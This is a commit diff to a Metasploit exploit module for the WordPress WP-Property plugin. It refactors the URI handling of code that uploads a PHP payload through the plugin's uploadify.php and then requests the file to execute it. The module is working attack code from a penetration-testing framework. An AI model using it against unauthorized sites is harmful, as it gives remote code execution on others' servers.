Land rapid7#3152 - Use normalize_uri for module wp_property_upload_exec

firefart · firefart · commit 94494e38e7b3 · 2014-03-28T13:22:54.000+01:00
diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
@@ -54,12 +54,11 @@ def initialize(info = {})
   end
 
   def check
-    uri =  target_uri.path
-    uri << '/' if uri[-1,1] != '/'
+    uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify', 'uploadify.php')
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
+      'uri'    => uri
     })
 
     if not res or res.code != 200
@@ -70,8 +69,8 @@ def check
   end
 
   def exploit
-    uri =  target_uri.path
-    uri << '/' if uri[-1,1] != '/'
+    data_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify/')
+    request_uri = normalize_uri(data_uri, 'uploadify.php')
 
     peer = "#{rhost}:#{rport}"
 
@@ -80,13 +79,13 @@ def exploit
 
     data = Rex::MIME::Message.new
     data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
-    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
+    data.add_part(data_uri, nil, nil, "form-data; name=\"folder\"")
     post_data = data.to_s
 
     print_status("#{peer} - Uploading payload #{@payload_name}")
     res = send_request_cgi({
       'method' => 'POST',
-      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
+      'uri'    => request_uri,
       'ctype'  => "multipart/form-data; boundary=#{data.bound}",
       'data'   => post_data
     })
@@ -95,12 +94,16 @@ def exploit
       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 
-    upload_uri = res.body
+    upload_uri = normalize_uri(res.body)
 
     print_status("#{peer} - Executing payload #{@payload_name}")
     res = send_request_raw({
       'uri'    => upload_uri,
       'method' => 'GET'
     })
+
+    if res and res.code != 200
+        fail_with(Failure::UnexpectedReply, "#{peer} - Execution failed")
+    end
   end
 end
